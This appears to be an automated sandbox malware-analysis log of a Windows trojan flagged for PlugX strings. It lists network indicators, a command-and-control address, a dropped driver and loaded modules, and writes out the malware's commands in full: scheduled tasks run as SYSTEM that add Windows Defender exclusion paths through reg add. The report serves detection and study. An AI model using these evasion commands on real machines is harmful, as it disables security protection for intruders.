              Source: global traffic HTTP traffic detected: GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
              Source: global traffic DNS traffic detected: DNS query: a8mw1y.oss-cn-beijing.aliyuncs.com
              Source: global traffic DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
              Source: global traffic DNS traffic detected: DNS query: qsuula.net
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/%d.dll
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/%d.dllC:
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/ip.txt
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/ip.txtC:
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/upx.rar
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s/upx.rarC:
              Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50010 version: TLS 1.2

              System Summary

              Source: 4.2.BEqRkb.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 5.2.BEqRkb.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 40.2.2dHqG0.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140006C95 NtAllocateVirtualMemory,4_2_0000000140006C95
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sys
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\2dHqG0\2dHqG0.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2o63254452-763487230.06.exe
              Source: 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2o63254452-763487230.06.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: 4.2.BEqRkb.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 5.2.BEqRkb.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 40.2.2dHqG0.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
              Source: 189atohci.sys.0.drBinary string: \Device\Driver\
              Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.evad.winEXE@67/29@8/3
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0000000140001430
              Source: C:\Users\user\Documents\BEqRkb.exeFile created: C:\Program Files (x86)\2dHqG0
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7520:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\47.243.243.58:8917:Sauron
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
              Source: C:\Users\user\Documents\BEqRkb.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_358075
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3.dll40_2_00B21000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCommand line argument: tbcore3U.dll40_2_00B21000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: tbcore3U.dll42_2_006C1000
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCommand line argument: .l42_2_006C2E30
              Source: 2o63254452-763487230.06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Documents\BEqRkb.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 2o63254452-763487230.06.exeVirustotal: Detection: 11%
              Source: 2dHqG0.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: 2dHqG0.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: 2dHqG0.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile read: C:\Users\user\Desktop\2o63254452-763487230.06.exe
              Source: unknownProcess created: C:\Users\user\Desktop\2o63254452-763487230.06.exe "C:\Users\user\Desktop\2o63254452-763487230.06.exe"
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: unknownProcess created: C:\Users\user\Documents\BEqRkb.exe C:\Users\user\Documents\BEqRkb.exe
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: iertutil.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: sspicli.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: windows.storage.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: wldp.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: profapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: uxtheme.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: propsys.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: winhttp.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: iphlpapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: mswsock.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: winnsi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: urlmon.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: srvcli.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: netutils.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: edputil.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: dnsapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: rasadhlp.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: wintypes.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: appresolver.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: bcp47langs.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: slc.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: userenv.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: sppc.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: schannel.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ntasn1.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: msasn1.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: dpapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: cryptsp.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: rsaenh.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: cryptbase.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: gpapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ncrypt.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: twext.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: cscui.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: policymanager.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: msvcp110_win.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: workfoldersshell.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ntshrui.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: windows.fileexplorer.common.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: cscapi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: twinapi.appcore.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: textshaping.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: version.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: wtsapi32.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: secur32.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: starttiledata.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: coremessaging.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: usermgrcli.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: usermgrproxy.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: acppage.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: sfc.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: msi.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: aepic.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: ntmarta.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: sfc_os.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: pcacli.dll
              Source: C:\Users\user\Documents\BEqRkb.exe; Section loaded: mpr.dll
              Source: C:\Windows\System32\schtasks.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exe; Section loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exe; Section loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exe; Section loaded: xmllite.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: apphelp.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: wininet.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: taskschd.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: sxs.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: xmllite.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: msv1_0.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: ntlmshared.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: cryptdll.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: netutils.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: napinsp.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: pnrpnsp.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: wshbth.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: nlaapi.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: winrnr.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: devenum.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: winmm.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe; Section loaded: ntmarta.dll
